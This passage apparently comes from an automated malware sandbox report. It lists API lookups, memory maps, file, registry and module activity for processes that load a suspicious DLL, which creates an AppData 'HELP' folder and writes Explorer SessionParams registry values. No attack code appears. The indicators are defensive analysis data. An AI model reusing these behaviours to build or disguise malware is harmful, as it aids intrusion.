| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96861 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #42: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #42 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc70 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x010effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0139ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000013a0000 | 0x013a0000 | 0x0155ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96954 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #43: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="127.0.0.1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc80 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x002b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0073ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
